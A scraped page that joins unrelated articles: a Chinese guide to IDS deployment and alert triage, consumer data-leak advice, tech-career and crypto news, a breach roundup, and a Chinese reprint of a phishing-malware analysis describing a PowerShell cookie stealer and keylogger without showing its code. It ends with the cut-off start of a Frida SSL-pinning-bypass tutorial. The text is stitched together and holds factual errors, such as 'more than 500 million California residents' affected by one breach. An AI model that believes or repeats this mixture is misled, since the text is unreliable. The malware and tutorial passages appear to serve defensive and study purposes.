阅读： 104

文章目录

如果有时间请往下看看，或许会有“干货”

好吧，对于工程老司机来说，IDS的部署还能玩的出什么花样。是的，没有让各位失望，我也觉得确实没什么花样，但是我还是想说一说。

以上都是关于IDS部署非常通用的基本准则了，本文当然不会止步于此。一般我们和客户在进行IDS部署方案的时候客户都会询问其他人是怎么部署的话，区域是怎么划分的等等。下面就说说金融行业在以上部署原则上一般还会遵循那些要求。

一般情况下对于一个金融机构来说，数据中心两地三中心基本是跑不了的，有的甚至是三地四中心这样的奢华套餐。

全网下来怎么也得十几二十几台IDS检测设备，每天告警量少了的也得上百万条告警。这样就给实时监控带来了很大的挑战。对于全网IDS告警集中监控，可以通过分层的方法，一步一步把我们关注的需要处理的告警剥离出来。

首先通过规则过滤，把我们不关注的告警信息先屏蔽掉，当前入侵检测领域的告警类别分为五大类：拒绝服务类攻击事件、获取权限类攻击事件、信息收集类攻击事件、可疑网络活动类事件、网络监控类功能事件。其中后三类告警类别的事件，在实时监控中并不是我们关注的重点，在实时监控中拒绝服务类和获取权限类的告警事件是我们重点要关注，并且需要处理的。如果仅仅是按照大类来区分，还是无法把告警事件的类型降低可管理的范围内，那么接下来我们可以采用仅关注或者仅不关注的机制来进一步的达到目标。

这两种方法对于不同的场景会有不同的好处，举个例子。对于工作用的终端，我们既可以采取仅让用户安装那些软件来做限制，也可以采取仅不让用户安装那些软件来做限制。如果你能很容易的判断那些告警是你需要实时关注的，可以采取仅关注策略来过滤告警规则是很轻松的。如果你没有办法判断那些告警是需要实时关注的，但是你可以很明确的指出那些告警是非常确定不需要关注的，那么仅忽略的方法则更适合你。

接下来就可以更进一步的操作了。这里我想说的是，如果在你的网络环境中，还有WAF这样的设备存在的话，那我建议web相关的检测规则，类似sql注入或者xss这样的就直接忽略是最好的选择。毕竟这两类的告警误报率实在是太高了，既然有了专门针对web业务的防护设备，对于IDS这样针对系统和应用级的入侵检测设备，还是让它更专注的做它更擅长的事吧。毕竟漏洞利用类的告警检测对于IDS设备来说误报率还是极低的。

如果暂时网络中还没有WAF类产品，关于sql注入和xss类攻击也需要IDS来抗的话。这里就涉及到第二次过滤了

其实大家知道，对于sql注入或者xss类攻击主要的检测点在URL上的参数。因为研发同学在开发过程中不管是有意无意还是其他什么原因导致在传递参数的时候加入了很多符合攻击特征的内容，导致IDS设备在检测时候会出现“误报的情况”。针对这种情况当然最好的方式就是修改检测规则了，但是最好的方式有时候往往也是最坏的方式。因为这些特征是符合攻击特征的，如果把这些修改掉的话，一旦真的攻击来了的话就无法检测出来了。所以这个时候在我们的告警平台上再进行多一层的过滤，也就是上图中提到的黑白名单过滤。通过对sql注入和xss这类告警的url进行二次判断，来规避误报。具体灰名单的机制请见下图：

初始状态黑名单和白名单的池子是空的状态，所有告警全部报灰名单告警。通过梳理灰名单告警的URL去重，对筛选后的日志进行分析，判断是否是误报，如果不是误报，那么提取告警特征后更新黑名单，类似union 、group by之类的非常严重的特征直接更新到黑名单中。后需要有此类告警直接报黑名单。如果判断是误报的话，那么如果是非客户业务特征导致的，就要联系后台研发同事看是否可以对规则进行优化。如果是由于客户业务特性导致的，就需要通过和客户确认后进行白名单更新，后续再出现此类告警就不会实时弹窗提示，避免占用实施监控人员的精力来处理此类告警。

接下来就是告警处理了：

通过前两层的过滤后，这时候出现的告警基本上都是需要实时处理的了。毕竟IDS自己没有阻断功能，这是时候就需要配合防火墙来达到阻断的效果，类似IDPS的感觉，就是通过IDS和防火墙达到IPS的效果。

在平台上还需要创建一些封禁规则，这些封禁规则的主要元素就是，什么类型的告警在多长时间内达到多少条就达到封禁标准。一旦达到封禁标准系统就是自动提示，这个时候监控人员只需要确认一下是否封禁即可，当确认了以后监控平台会自动和防火墙联动进行IP地址的封禁，达到入侵防御的效果。

这一部分一般是大家很少和客户沟通的，至少在以前我在和客户讨论IDS实施方案涉及后续运维的时候事没有提到过的。但却也是想要做好告警分析很核心的一部。这一块涉及的主要是内外网IP地址的转换。说的直白一点就是IP地址业务映射表。不出意外在流量穿过防火墙或者负载均衡的时候都会进行地址转换。所以我们需要知道告警的目的IP地址对应的都是那些业务，尤其是外联网或者核心网区域，全部都是私网地址的情况更是多如牛毛，这个时候如果没有办法第一时间确定IP地址，可能无法有效的对告警进行分析确认。另外，很多时候，网络会对源IP地址也进行了转换。这个时候需要在IDS设备上开启x-forword字段的转换功能，不然看到的就全部都是内网IP地址，就没有办法进行封禁了。除此之外会有一种可能就是防火墙或者负载均衡设备在配置了地址转换后没有开启x-forword字段填充，导致IDS设备虽然开启了x-forword字段的转换功能但是在互联网区域还是偶尔可以看到源地址是内网IP地址的告警，这时候就需要有和网络确认修改相关配置的机制来确保配置的更新。

大家都知道入侵检测设备是依靠规则库进行工作的，势必就会涉及到规则库升级的工作。一般情况下会有两种更新机制：

对于常规的设备升级，一般情况下建议都是放在晚上6点之后非业务高峰期进行。关于这一点不要问为什么，也不接受反驳。

除了以上常规的规则库升级以外，另外最常见的还是互联网高危漏洞爆发的应急升级。

一般在互联网高危漏洞爆发后，我们的研发会在8小时内紧急出升级包，在获取规则升级包以后进行设备的升级，并验证检测规则的有效性。在整个高危漏洞应急过程中，获取到规则升级包之前可以配合客户做一些业务取证方面的工作。在IDS设备升级完以后，则可以把精力更多的放到全网的漏洞摸底上面。

上面介绍了一些方法和手段使得我们可以实时的对有效的入侵告警进行检测和处理。那么非实时的告警该如何进行分析那？很多时候我们的同学在刚开始接触告警日志分析的时候都会出现一个问题就是面对一大堆告警不知道如何下手，不知道该做些什么。在我看来告警分析不外乎就是说清楚你面前的这些告警都是什么，是否可以分类，有哪些特征，以及最重要的是：为什么会是这样？的一个说明。下面就简单的分享几个思路：

以上是关于非实时告警可以进行分析的一些方向，如果有精力的话可以横向继续展开进行。如果精力有限的话，也可以先把实施告警的监控运营做好，非实时的告警分析可以慢慢足步的开展。相信我，深入下去你会发现很多有价值，有意思的东西。

当我们的设备将要或者已经处于一个高负荷状态下时，就应该考虑增加设备的数量，或者替换更高性能的设备了。这个工作可以每年年底的时候进行（一般年底前会计划第二年的采购相关事宜）。建议通过梳理客户的网络结构，业务情况来进行。比如说：客户的网络比较一年前发生了那些变化，业务情况发生了那些变化，流量情况发生了那些变化。结合我们设备的工作情况，给出一个具体的优化建议。新增的区域该增加多少设备，消失的区域可以替换下来多少利旧的设备。当前设备的性能是否还能良好的工作，以及估算后面几年业务流量的增加情况是否可以覆盖等等。给出具体的优化方案

写到这里，我才发现。对于IDS来说好像真没有太多值得的写东西。希望没有浪费大家太多的时间。

在整个纵深防御体系中，IDS设备处在防火墙之后，WAF之前。旁路接收解密后双向的镜像流量来检测系统级别的入侵告警。

可能在众多的安全设备当中，IDS设备算是在部署方面最“简单”不过的了。但是如何在一个庞大的网络当中合理的规划好逻辑区域，使得不同的IDS能刚刚好的检测各自区域的告警成为当前一个安全交付人员最大的挑战。因为如果区域划分的不好，势必就会出现不同区域的告警在同一台设备上，这时候单台设备的告警在分析的时候就会多了很多干扰的因素而失去本身区域所具有的代表性。

当我们把IDS设备部署到网络当中去，最重要的就是监控告警并且进行相应的处理。上面也讲到了通过各种手段和方法使得告警层层过滤，最终把有效的告警展现在我们面前，配合防火墙进行封禁。在这一步中设备的告警准确性就是我们最关注的了，通过特有的黑白名单机制把误报消除后可以让我们没有后顾之忧的处理那些黑名单告警。因为IDS设备是依靠规则进行工作的，所以需要按需就行规则库的升级。上面也提到可以定制升级，也可以不定时升级。具体方式也取决于不同客户的不同特点。

除此之外，我们还需要定时的对告警数据进行分析。当前网络安全领域什么最有价值，当然是数据了。守着每天几百万的告警数据，不进行分析的话，那可真实暴殄天物。上面也给大家分享了一些关于告警分析的思路以及原则，希望可以抛砖引玉。

当前面的我们都已经做好了，最后的最后就是涉及到整体IDS设备的部署优化了。只有做到对客户网络环境、业务环境、以及我们IDS设备的运行情况了如指掌，就可以根据具体的变换对IDS设备进行部署优化。真正做到从软件到硬件，从物理到逻辑的不断优化，不断提高。

最后，让我们共同期待，经过我们每个人实施过的IDS，在线上运行的每一分钟都发挥它最大的价值。

前几日，万豪酒店集团旗下喜来登酒店发生了5亿房客信息泄漏事件，其中3.27亿人的信息包括姓名、地址、电话、生日、护照号码，甚至部分人的支付卡号和支付卡有效期等同时遭到泄露。一石激起千层浪，面对频频发生的信息泄露事件，网友各抒己见，有人用“时刻像在裸奔”表达了自己的心理感受;有人则表示需要“严惩责任人，赔偿损失”，对事件进行妥善处理;然而更多网友关心的还是“该如何预防信息被泄露”、“信息泄漏后怎样将损害降到最低”。

(图片来源于网络)

今天小编便针对大家最关心的问题，分享日常生活中如何预防信息泄露，以及信息泄露后该如何防范可能引发的骚扰诈骗问题。

上文提到的信息泄露方式，或许是用户“不小心而为之”，但还有更多信息泄露的渠道，是不法分子设下的陷阱。很多人在发现自己信息泄露后常产生疑惑，究竟私人信息是如何泄露出去的?事实上，有时候你不经意间的某些行为，可能会成为泄露信息的源头。根据腾讯手机管家发布的《智能手机生活：支付病毒隐私泄露报告》，生活中隐私信息泄露的最常见的方式包括：在社交平台分享自拍、合照、地理位置，访问来路不明的网址或参加在线测试，丢弃未做处理的身份证复印件、快递单，将个人信息委托给黄牛代购车票等。

(图：腾讯手机管家发布报告，揭秘隐私信息泄露的多种渠道)

星座迷小张热衷于各种命运测试和星盘解读。在某部古装热剧播出后，小张看到“测测你前世是XX中的谁”的测试，便兴致勃勃地点击测试。因为回答几个简单问题便能得到一个剧中人物的结果，小张并没有留意打开的页面是否正常、网址是否可靠。结果做完测试的当天，小张就连续收到了多个垃圾短信和骚扰电话，不厌其烦却束手无策。原来，小张的个人信息因访问来路不明的网址被盗取，进而遭受到垃圾信息的攻击。

上文提到的信息泄露方式，或许是用户“不小心而为之”，但还有更多信息泄露的渠道，是不法分子设下的陷阱。在利益的驱使下，不法分子会利用黑客技术攻击数据库、搭设虚假WiFi和风险WiFi、恶意传播包含木马病毒的二维码、钓鱼网址等手段，可以轻松窃取用户的隐私数据。与此同时，人为倒卖信息、网站漏洞、智能硬件漏洞也同样会造成个人信息的泄露。万豪酒店集团旗下喜来登酒店5亿房客信息泄漏事件，便是不法分子盗取用户隐私信息的典型案例。

(图片来源于网络)

上班族李先生是手游玩家，周末陪老妈逛商场时，他顺手便连上了附近的免费WiFi玩游戏，谁知游戏还没开始，手机页面便一直出现各种弹窗，直到他将WiFi断开，垃圾弹窗才逐个关闭。事实上，李先生是遭遇了风险WiFi攻击。除了垃圾弹窗的骚扰外，他的个人信息如银行账号、密码等很可能也在不知不觉中遭到了盗取。

而隐私泄露带来的严重后果不言而喻。最常见的是，很多刚刚买完房的人，每天会接到几十通装修公司的骚扰电话。更严重的是，信息泄露可能会导致电信网络诈骗，尤其是在“假冒公检法”诈骗中，不法分子手中掌握了精准个人信息，成为受骗者步入圈套的最直接原因。

面对不法分子恶意获取个人信息进行骚扰、诈骗的行为，国家、企业和用户个人需要共同努力防御、抵制。国家网络监管部分多举措并行，可以全面打压此类事件发生;企业需要不断进行信息系统升级，为用户信息建立严密的防火墙。

用户自身则需要提高安全防范意识，保护个人信息安全，拒绝骚扰诈骗电话。一方面，对身份证复印件、快递面单等包含个人信息的物品进行妥善处置;另一方面，借助腾讯手机管家等安全软件，通过识别钓鱼网址、风险WiFi、查杀病毒APP等避免信息泄露。即便是信息泄露后，大家也可以借助骚扰拦截功能，避免不必要的接听，保护财产安全。

郑重声明：中国软件资讯网站刊登/转载此文出于传递更多信息之目的 ，并不意味着赞同其观点或论证其描述。中国软件资讯网不负责其真实性 。

Considering how quickly technology advances and evolves ― it can seem impossible to stay ahead. But if you know what’s changing, you can ride a wave to success ― instead of watching it crash around you. There are three major IT technologies that we watched grow this year, and expect to keep going in 2019.

Cybersecurity, the blockchain, and data science saw explosive evolution and growth in 2018 ― and show no sign of slowing down. Companies large and small are investing in systems and products related to these three areas. What you need to know is that they’re already on the lookout for people trained in creating, implementing, and maintaining the technology to use them.

It’s probably not a surprise that cybersecurity tops this list, but it should be. After all, it’s not that the importance of cybersecurity changed. Security has always been important, but it seems like everyone just realized that this year. Subsequently, companies are finally throwing resources at products and personnel to sure up their systems.

There’s no shortage of security products to buy. One estimate from Forbes predicts that products and services in the information security market will reach an excess of $114 billion by the end of 2018. That’s a 12.4% increase from 2017.

While there’s plenty of products, personnel is another matter. The security industry is increasingly shorthanded. That same Forbes report says that finding people with sufficient digital security credentials was one of 2018’s most pressing concerns in hiring. If you stay ahead of the curve and know the most recent threats and capabilities, you could be the big winner.

The last few years (and elections) have seen a lot of conversation about digital security, hacking, and data manipulation. Concerns about cybersecurity won’t fade away in a few months. Security risks, business needs, and industry changes are the three major drivers behind the need for digital security. The need for cybersecurity isn’t going anywhere, but the truly savvy job-hunter should probably consider why businesses need their data secured.

So, what do you know about hardware authentication, user behavior analytics, and cloud security? Those are cybersecurity’s growth areas in 2019, and you can learn them with CBT Nuggets .

Oh, blockchain. You were living under a rock in 2018 if you didn’t see the explosion in hiring for blockchain “experts.” Bloomberg reported that jobs that called for blockchain experience increased by four-fold in 2017. Meanwhile, Indeed.com estimates that since 2015, the number of jobs looking for blockchain training has increased by 631%.

Basically, if your resume even brushed up against a blockchain skill set, your LinkedIn message box was probably overflowing this last year. The manpower gold rush isn’t over yet. Organizations are still rushing to hire people who can fulfill their needs. Whether it’s small businesses or large, blockchain provides security, fraud-prevention, and management efficiency that’s unique.

Most people in the general public know about blockchain because of Bitcoin, the inaugural blockchain currency. But, that’s just one of the thousands of cryptocurrencies ― and, importantly, only one application of the technology. Blockchain is actually huge ― and growing.

Smart contracts are one of the most cited applications for blockchain. These programmatic self-executing agreements can unlock some exciting implications for business, real estate, or even retail transactions. With immutable, public ledgers, blockchain-enabled crowdfunding means more transparency in fundraising and money distribution. And there are even programs that enable blockchain governance ― ensuring fair representation for people in an organization’s decision-making processes. Even file storage becomes much better with blockchain.

Those changes aren’t going to come about on their own. Companies need people who know how to create and implement blockchain and how to navigate blockchain methods to help a business achieve its unique goals. As that technology expands, learning how to develop blockchain technologies will likely guarantee you a lucrative and exciting career. Even more traditional IT vendors are taking the blockchain plunge. For example, VMware recently announced that VMware Blockchain is in beta .

It wouldn’t be a bad idea to make sure your IT security and storage skills are up to snuff if you plan to work with blockchain.

Many years ago, a researcher proclaimed that 90% of the data in the world today was created in the last two years. That statistic has become part truth, part fable, and mostly just a good illustration to say, “We generate so much data.” Here’s the point. Companies are hoarding more data than ever before because it’s cheap and easy, but many of them don’t know what to do with it. That’s where data science comes in.

With every transaction, call, or click, someone is collecting data about user’s behavior or preferences. But it’s only just data until someone translates that data into insight. Transforming raw data into useful information is something that trained data scientists do.

Jobs for data scientists are on the rise. In the last three years, jobs for data scientists increased by 75%. If you know python , R, Hadoop, Java , Tableau or other programming languages, you could find a place at the data science table.

Companies need help extracting useful information from the huge trove of big data that exists out there. If helping them do that sounds interesting to you, you might be even more interested to learn that a typical data scientist job pays about $119,000 to $168,000 near the top of the average. There’s never been a better time to learn how to analyze data, automate analysis, and update models and systems for big data companies.

Home News MasterCard Warns India’s Data Storage Law Could Impact Online Payments, Security

MasterCard Warns India’s Data Storage Law Could Impact Online Payments, Security

From October 16, the Reserve Bank of India has mandated all companies facilitating financial transactions to store user data in India. As a result, credit giant MasterCard will be deleting the data related to Indian users from its data centers that are located outside the country.

MasterCard has already starting to store all transaction-related data of Indian users at its data center in Pune. Following RBI’s directives, the company will startdeleting all data including users’ card number and transaction details.

MasterCard said that out of the 200 countries where it operates, none has asked it to delete data from its global servers. It has also informed the RBI about the potential demerits of this localization.

Deleting data from global servers and concentrating all the information in a centralized database would weaken the “ security of this data over a period of time “.

The date for this deletion of data from global servers is yet to be decided. MasterCard has proposed a date to the RBI and is waiting for a confirmation from the central bank. The creditor has initiated the process of copying the data and will start deleting the data once RBI acknowledges and responds to the request.

Since thedeletion of data is not like “ pressing a button “, it is not a simple process and requires proper scrutiny at multiple checkpoints. In the process of deletion of data, users might be charged again for a past transaction, and thus, it has to be taken about carefully.

MasterCard has also informed Press Trust of India that with the localization of data, there will be an “ incremental cost “. This is because any data that has to be sent internationally will be processed in India first and stored indigenously.

Not only does this increase operational costs, but can also result in delayed or failed transactions if the recipient country’s data protection or privacy laws are not strong enough.

Tushar Mehta - Dec 17, 2018

Nadeem Sarwar - Dec 17, 2018

Partner Content - Nov 14, 2018

Written by

Dec 17, 2018 | CYBERSCOOP

The New York attorney general’s office said five apps made by well-known companies could have leaked user data. The firms Western Union, Priceline, Equifax, Spark Networks and Credit Sesame have agreed to revamp the security of their apps as part of a settlement announced Friday.

The stateoffice said the companies failed to use the proper protocols to secure user information that is transmitted over the internet, despite assuring users about the security ofthe apps in question.

“Businesses that make security promises to their users especially as it relates to personal information have a duty to keep those promises,” said Barbara Underwood, the New York attorney general, in a statement .

The AG’s office said that the apps at had a “well-known security vulnerability” that couldenable man-in-the-middle attacks, whereby a hacker can intercept data when it’s sent via a wireless connection. The office explained that apps that fail toproperly implement the Transport Layer Security (TLS) protocol to protect data in transit are particularly susceptible to such an attack. This settlement only is the latest in which state attorneys or the Federal Trade Commission have faultedorganizationsforexaggerating their security practices.

“Although each company represented to users that it used reasonable security measures to protect their information, the companies failed to sufficiently test whether their mobile apps had this vulnerability,” the office said. “Certain versions of the companies’ apps all failed to properly authenticate the SSL/TLS certificates they received. As a result, an attacker could have impersonated the companies’ servers and intercepted information entered into the app by the user.”

Thecompanies implicated in the settlement are a diverse set that handle data that includes basic contact information, login credentials, banking or payment information andSocial Security Numbers. Such information could be used for fraud.

The settlement requires the companies to “implement comprehensive security programs to protect user information.” It was not immediately clear what those programs must entail. The office of the attorney general did not respond to a request for comment.

The settlement is part of a broader effort to find security flaws in consumer products before theyare exploited.

“As part of this initiative, the office tested dozens of mobile apps that handle sensitive user information, such as credit card and bank account numbers,” the office said.

The Daily

By

-

In The Daily on Monday, a new digital coin project targeting the ‘Yellow Vest’ protesters is promising censorship-free crypto transactions. Also, a regulated security token trading platform is now live in the U.S., South Korean internet giant Kakao invests in an Israeli startup, and crypto exchange Abra is giving away bitcoins for Christmas.

Also read: Trump Chooses Bitcoin Advocate as Chief of Staff, Congressman Proposes Wall Coins

A new digital token project using symbols associated with the Yellow Vests (Gilets Jaunes) protestors in France has been devised. The creators of the Gilet Jaune Coin (GJCO) claim their main goal is to support what has become an international movement “in the legitimate struggle of nations to self-determination, and the reconquest of their economic, territorial, and monetary sovereignty.”

The coin’s website is littered with slogans such as “Get your freedom back,” “Long live the Gilets Jaunes” and “The people will not be sacrificed on the altar of debt!” It also abounds in promises and calls like “We will be listed on exchanges soon,” “To stay united, you should mine on our own pool” and “We invite you to buy a Gilet Jaune Coin wallet.”

The project’s team claims the coin is inspired by Bitcoin and based on Ethereum, and insists GJCO is easy to use and “perfect for transactions… at ridiculously low costs.” The developers of the new crypto further assure the public that the Gilet Jaune Coin is censorship-free and fraud-resistant, stating that its use is “recommended during the fight against the banking oligarchy, seeking to enslave us!”

It’s unclear whether the digital coin is actually related to the Yellow Vests Movement. The social media links on its website do not lead to real accounts, but coin’s Telegram channel now has over 90 members. The Mouvement des Gilets Jaunes demonstrations, which started as a protest against increased fuel prices in France this past November, have spilled over to other EU countries and even Turkey and Iraq. Protesters have also raised a number of demands related to socio-economic problems such as low incomes and government corruption.

The platform is now available to both accredited and non-accredited investors in the United States and other markets. It implements a one-time verification procedure through an application called Investor Passport that allows users to invest based on their eligibility. Open Finance Network has also developed its own security token standard called the Smart Securities Standard in order to be able to offer both token issuance and secondary market trading.

South Korean Internet giant Kakao Corp. has invested in the Israeli crypto startup Orbs through its venture arm, Kakao Investment, Reuters reported.Kakao, which is South Korea’s largest messaging app operator, announced earlier this year its plans to establish a unit focused on blockchain technology. Orbs, which did not disclose the size of the investment, said the funds will help it grow and build on its existing partnership with the Kakao blockchain subsidiary Ground X. The two companies are already working together to develop applications of crypto technology.

Images courtesy of Shutterstock, Gilet Jaune Coin.

Make sure you do not miss any important Bitcoin-related news! Follow our news feed any which way you prefer; via Twitter, Facebook, Telegram, RSS or email (scroll down to the bottom of this page to subscribe). We’ve got daily, weekly and quarterly summaries in newsletter form. Bitcoin never sleeps. Neither do we .

Quora, a website that allows users to inquire about different topics for credible feedback, was recently attacked by hackers. This website has been trusted by 300 million users, but, due to this immense cyberattack, users are now questioning the safety of their personal data on the site. Last week, Quora discovered that their database had been infiltrated, and that about one-third of their users were affected. The investigation is still ongoing; however, it is certain that user account information has been accessed by an authorized third party.

First multi-state healthcare breach impacts 3.9 million

The news of a healthcare breach is severe enough as is, but the announcement of the first multi-state data breach is nothing short of a cybersecurity disaster. The protected health information (PHI) of 3.9 million people was accessed through this single breach, and the affected healthcare companies failed to disclose the occurrence in a timely fashion. A lawsuit was recently filed against the involved healthcare firms, but the investigation shows that the breach actually happened in 2015.

Australia’s anti-encryption bill becomes law

In Australia, law enforcement can now undermine encryption in order to gain unauthorized access to civilian devices. The government claims this will help stop terrorist attacks, homicides, and other serious crimes. However, this allows for the invasion of privacy and creates a loophole for cyber criminals, causing many concerns about the security of sensitive data. Now that the Australian government has set this law, any company or website operating within the country will have to find a way to preserve the trust between them and their users.

Unprotected MongoDB server exposes 66 million

A database with personally identifiable information (PII) of 66 million individuals was found unprotected. This information included full names, contact information, employment history, and more. The availability of this information gives malicious cybercriminals the power to launch targeted phishing attacks that are difficult to recognize. The information seems like it has been scraped from LinkedIn profiles. Fortunately, the data did not fall into the wrong hands and was taken offline before it could affect the users exposed.

Malware attack undetected for four years

The existence of malware within a 1-800-FLOWERS database was recently discovered. The threat was stealing funds from customers’ credit cards for four years before finally being detected. Other information was also collected, including full names, card numbers, expiration dates, and card security codes. More than 500 million California residents have been affected and the state’s attorney general office has filed a legal complaint.

To learn about cloud access security brokers (CASBs) and how they can protect your enterprise from ransomware, data leakage, misconfigurations, and more, download the Definitive Guide to CASBs below.

Your personal data may be up for sale on Dark Web for as low as Rs 3,500 that includes stolen social media accounts, banking details and credit card information from sites like Uber as well as gaming and porn websites, a new research has warned.

According to cybersecurity firm Kaspersky Lab that investigated Dark Web markets to find out how much personal data is worth, cybercriminals can sell someone's complete digital life for less than $50 (nearly Rs 3,500).

"This can include data from stolen social media accounts, banking details, remote access to servers or desktops, and even data from popular services like Uber, Netflix , and Spotify , as well as gaming websites, dating apps, and porn websites which might store credit card information."

Representational image.

The Dark Web, also referred to as the Dark Net, is an encrypted portion of the internet that is not indexed by search engines.

The Kaspersky researchers found that the price paid for a single hacked account is lower, with most selling for about $1 per account and with criminals offering up discounts for bulk-buying.

"It is clear that data hacking is a major threat to us all, and this applies at both an individual and societal level, because stolen data funds many social evils," said David Jacoby, senior security researcher at Kaspersky Lab.

Data stolen due to people's lax security may have limited resale value, but can be put to many uses.

"This can cause huge problems for an individual victim, who may lose money and their reputation, find themselves being chased for debt that somebody else has incurred in their name, or even suspected of a crime that somebody else has committed using their identity as a cover," said researchers.

The most common way criminals steal this sort of data in the first place is via spear phishing campaigns or by exploiting a web related security vulnerability in an application's software.

After a successful attack, the criminal gets password dumps which contain a combination of emails and passwords for the hacked services.

"With many people using the same password for several accounts, attackers might be able to use this information to access accounts on other platforms too," said Kaspersky Lab.

Interestingly, some criminals selling data even provide their buyers with a lifetime warranty, so if one account stops working, the buyer will receive a new account for free.

"There are steps we can take to prevent it, including by using cybersecurity software, and being aware of how much data we are giving away for free - particularly on publicly available social media profiles, or to organisations," Jacoby noted.

在我们对威胁进行日常搜索中，我们收到了一条报道，其主要内容为针对土耳其国家的网络钓鱼事件。经过初步评估后，我们决定对这个事件进一步调查。在调查中，我们发现这个安全事件与最近阶段的其他活动有相似之处，也意味着他们可能出自同一个组织之手。

网络钓鱼文件针对的是来自土耳其的受害者，在调查之初，我们也尝试设法去找到针对卡塔尔用户的攻击网络。而这些攻击文件试图引诱人们参加在Instanbul举行的“Al Quds议员协会”会议。而 Al Quds中的Parlamentarians是一个协调“国际议员支持巴勒斯坦事业”的委员会。

谷歌翻译帮助非阿拉伯语使用者理解网络钓鱼活动的具体内容：

该文件邀请参加受害者在12月13日至16日参加举行的会议，题目是“耶路撒冷是巴勒斯坦永恒的首都”。 然而，目前还没有与此会议相关的公告在官方网站上公布。

攻击涉及了两个文档文件，而这两个文档都遵循了相同的传统攻击策略：试图诱使受害者点击“启用内容”按钮来运行恶意代码：

注入代码运行一个命令提示符，调用powershell，然后运行从恶意主机下载的.ps1脚本。

我们使用 ReaQta-Hive 还原了攻击流程：

可以看到 Winword.exe 生成带有可疑命令行的 cmd.exe 实例：

对命令行进行反混淆操作会传递给 powershell.exe 的实际参数详情：

参数传递给powershell的方式是值得研究的的。它似乎是一种逃避命令行监控的方法：

powershell的脚本用于窃取来自Chrome，Opera和Firefox的cookie，会话，登录信息，还有一个用于键盘记录的模块。 获得的数据之后被用于渗透到以下C2服务器：

该脚本下载与浏览器的 localdb （分析窗口＃4）交互所需的 sqlite DLL ，它创建一个 GlobalMutex GlobalrYF1pgeADA 以避免攻击程序窃取多个目标的信息。它将初始化键盘记录器并循环捕获所需的功能信息，最后建立持久性。

应特别注意黑客所使用的攻击持久性方法：计划任务用于持续攻击。

之后，下列代码会被执行：

ReaQta-Hive自动识别此程序存在异常行为，并重启此代码，如下图所示：

如上所述，在网络钓鱼活动中提供的脚本可以从谷歌Chrome / Firefox / Opera中窃取cookie和登录信息，之后键盘记录具有持久性并执行squiblydoo攻击计划的目标。该脚本接受从C2部署的自定义脚本，这意味着攻击者可以随意扩展其功能：

我们在下面列出功能列表以供将来参考所用：

键盘记录器似乎使用的代码似乎与github存储库获取的代码相同：

C2始终展现出一个有趣的现象，URL的路径始终是： /api/{endpoint} ：

在前人研究的信息帮助下，我们能够在以前的网络钓鱼活动中所使用的模式中发现其他样本：

正如一开始所指出的那样，这个先前的样本似乎将目标对准了卡塔尔的用户，并冒充卡塔尔的慈善机构组织。

该文档最初是在2018年8月初

被发现的，而与当前版本相比其只有少量代码被更改。具体更改的位置是行为，持久性和脚本代码。

我们已经上传了VirusTotal的安全分析过程。 在分析窗口＃1中，我们可以看到cmd.exe的命令行并没有使用模糊处理：

为了使分析具有完整性，这里使用了以前版本的powershell脚本并做了一些更改：

原始平台地址：

这三个文档共享一个相似的元数据结构：

我们可以观察到这两个事件的相似性，这两个域都使用相同的自由动态DNS服务： DNSExit 。

由于这个攻击设计了多个潜在的目标，所以是十分有趣的。除此之外，系统还使用了系统二进制文件（lolbins）并通过powershell执行恶意活动、计划任务持久性和用于隐藏命令行的“回声”技术。这个事件的攻击者十分活跃，根据我们的研究发现，所检索的文件类型提供了证据证明这些行动可能是出于政治动机，而不是网络犯罪团伙的私人攻击。

由于 Spear-Phishing 的易操作性，经过培训的人员很容易使用此攻击进行攻击，所以其工具也受到攻击者的喜爱。

ReaQta-Hive使用人工智能自动检测目标（如刚刚分析的威胁），帮助分析师深入检测威胁活动并自动发现异常行为。由于缺乏传统的二进制的payload，操作系统组件（lolbins）上的内存威胁能够绕过传统防御，同时留下较低的取证范围。如果想要进一步了解相关威胁情况，请与我们联系。

本文转载自:先知社区

Recently a group of researchers described a scenario wherein password recovery questions were used to break into windows 10 PCs. This has led to some suggesting disabling the feature. But you don’t need to do this if you’re a home computer user.

As Ars Technica first reported, Windows 10 has added the option to set password recovery questions on local accounts in the past year. Security researchers delved into this and discovered that on a business network this could lead to potential vulnerability.

Right off the bat, you can spot two important points there:

There’s also a third point that’s even more important. All of this requires themalicious actor first to gain administrator-level access on the network. From there, they could then identify machines connected to the network that still have local accounts and then add security questions to those accounts.

Why bother?

The idea is that if admins discover and revoke the malicious actor’s access, subsequently changing all the passwords, the actor could, in theory, make their way back into the network to these machines and use their custom questions to reset those passwords and regain full access.

The researchers suggested they could also use a hashing tool to determine the previous password, and then restore the old password to hide their access. The trouble here is that most domains networks don’t allow reused passwords by default.

When Ars Technica asked Microsoft for comment, the response was short:

While that might seem obtuse at first, what Microsoft is implying is right, and it brings us to the real crux of the matter. Once a malicious actor has administrative-level access on a network, the potential damage and avenues of attack go far beyond simple password reset tricks. And if a network is robust enough to prevent the malicious actor from ever gaining administrative-level, then all of this is moot.

So, in the end, our malicious attacker would need to gain administrator-level access to a business network that uses a Windows domain, find computers that might have local accounts on them, and then create security questions so that they could get back into those computers if they are discovered and locked out. And we’re supposed to be worried about that when their administrator-level access gives them the ability to do so much more harm already.

If you’re using a Windows 10 computer at home, the short answer is almost certainly not. And here’s why:

So, the chances are very high that none of this research applies to you. But even if you are using a local accountjoined to a domain, all of this comes down to an age-old set of questions. How much convenience should you give up in the name of security? Conversely, how much security should you give up in the name of convenience?

In this case, the chances of a bad actor accessing your machine and using security questions to gain full control are incredibly remote. And the chances of forgetting your password and needing the questions are a little higher. Take stock of your situation, and make the best choice for you.

( Original textBY OMESPINO )

Hi everyone It’s been a while from my last post but I’m back , now I want to show you that you can start hacking android apps with frida without pain, I took me several hours to figure out how to get the frida installation ready but at the end that wasn’t really really difficult, the main problem is that I didn’t found a pretty clear tutorial for beginners in mobile security like me, so that’s why decided to create this 10 min tutorial. if you want to skip frida description you can go directly to Step 0 to start frida installation

Extracted from frida website : “It’s Greasemonkey for native apps, or, put in more technical terms, it’s a dynamic code instrumentation toolkit. It lets you inject snippets of javascript or your own library into native apps on windows, macOS, GNU/linux, iOS, Android, and QNX. Frida also provides you with some simple tools built on top of the Frida API. These can be used as-is, tweaked to your needs, or serve as examples of how to use the API.”

So basically frida is a tool that let you inject scripts to native apps (in this case Android apps) to modify the application behavoir (in this case make a ssl pinning bypass and can perform a MitM attack, even if the aplication has https / ssl connections) and make dynamic test in real time.

Disclaimer:this method won’t work with applications that uses HSTS (HTTP Strict Transport Security) per example facebook, instagram, twitter, paypal, banking apps, etc, but don’t worry most applications don’t uses this protocol yet.

python 2.7

